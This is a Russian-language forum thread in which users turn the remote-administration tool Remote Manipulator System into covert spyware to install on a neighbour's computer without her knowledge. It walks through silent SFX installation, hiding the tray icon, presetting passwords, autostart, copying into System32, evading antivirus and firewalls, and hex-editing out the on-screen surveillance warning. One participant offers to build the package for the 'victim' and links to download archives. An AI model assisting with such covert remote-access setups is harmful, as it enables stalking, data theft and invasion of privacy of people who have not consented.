отличний софт токо хотел спросить спецов....можно как то "сервер" спрятать з панели задач?? + можно снять банер "Ведетса видео наблюдения"??
Иконку из панели спрятать я думаю особо труда не составит, ну или подменить ее на что нибудь заурядное. А вот - действительно не айс
а можно зделать Remote Manipulator System другим тоесть изменить так чтоб при установке зразу ставилисб паролм...зразу скривалось з панели задач....и все ето запихнуть в SFX архив и зделать чтоб часть "сервер" из етой програми устанавливалса скрито что-то наподобе https://forum.antichat.ru/thread97202.html
При запуске архива его содержимое копируется в C:\temp > запускается "тихая установка" > содержимое папки C:\temp удаляется. Остается проблема с подключением к удаленной машине - по умолчанию при установке пароль на сервер не задается, с пустым паролем подключиться не удалось. По всей видимости настройки (в частности пароль на подключение) хранятся то ли в реестре, то ли еще где то Где именно - с товарищем еще не разобрались Ссылка на архив http://depositfiles.com/ru/files/0assguzjf [ 4.3 MB ] Содержимое архива:
Давно пользуюсь этой прогой. Ещё со времнен ROM'a. Скрытую установку+скрытое пребывание в компе (не считая процесса) настроить можно. Баннер о видеосъемке я частично отключал с помощью HEX редактора( теперь баннер выскакивает на 1 сек и пропадает). Вот видео по настройке ROM'a, он аналогичен RMAN. Настраивается также, только в батнике имена файлов поменять надо. P.S: видео не моё. http://zalil.ru/30234996
Timon132009 спасибо за видео) еще б скритую установку зделали + пароль + скрить з трея ну если еще и пароль на настройки сервера поставятса то цени вам не будет) makag буду мать надежду что все же розберешса и зделаеш "авто софт"))) + ИП на почту ненада.....
хорошо если получитса все коректно то будет супер)\ + можно спросить разработчиков где сохраняютса пароли а что?...возможно и скажут)
В чём проблема то с паролями? Устанавливаешь себе сервер, настраиваешь иконку в трее и пароли, вместо IP на почту можно настроить обратное соединение. Экспотируешь ветку реестра RMan и засовываешь её в батник. P.S: Пароли хранятся в реестре.
проблема в том что софт я засунуть одной соседке.....чтоб она токо два раза клацнула по файлику и все.....все настройки есть....само з трея скрилось...само пароль на настройки и на подключения поставило+ автозагрузка при каждом старте компа.... ВОТ что мне б хотелось....если конешно ето ваше реально + главная проблема ето то что я плохо все ето понимаю...батники и т.д и т.п
Такое возможно. Давай помогу сделать. У нее IP постоянный и выделенный? Если нет то скинь свой IP или DynDns имя я обратное подключение настрою.
ето локальная сеть...пример у меня 192.168.2.2 у неє 192.168.2.3 пароль задать такой как я напишу в приват можеш? я думаю что если ти настройки зделаеш то етот пакетик можно будет устанавливать везде просто надо будет знать ИП того кому устанавливаеш...я про ИП локальной сети + я щас попробую по одном видео зделать....если не получитса то делай ти.....ну ти делай а я за 15 минут дам знать получилось или нет
Ну вот попробуй этот файл. Делал без обратного соединения. Т.е. что бы подключиться нужно знать IP жертвы.
отлично)) ну есть вопроси 1.....куда устанавливаетса файл ато его нигде не видно))) 2....пароль кинул в приват пожалосто зделай з етим паролем 3....антивирусами палитса ато у меня их нет?)) 4....если зделать так чтоб подключения било через 80 порт то все пойдет? почему через 80....а потому что в большенстве случаеш фаерволд антивирусов 80 порт приймает как свой и учить антивирус не прийдетса
1- Все файлы копируются в "%SYSTEMROOT%\System32\ 2- Сейчас сделаю 3- Антивирусами не палится 4- Порт лучше оставлю стандартный. Программа сама себя прописывает в список исключений.
она прописиваетса в обичний файрволд винди ХР но не прописиваетса в файрволд антивируса как например NOD 32 4.0 smart security хотел еще спросить....а з гостя а не админа она пропишитса ?? ООО...а з банером "ведетса видеонаблюдения" зделать что-то можно?
Из под гостя наврятли прога заработает, для установки нужны права администратора. Сейчас попробую частично убрать баннер... Если уберу то в ЛС отправлю.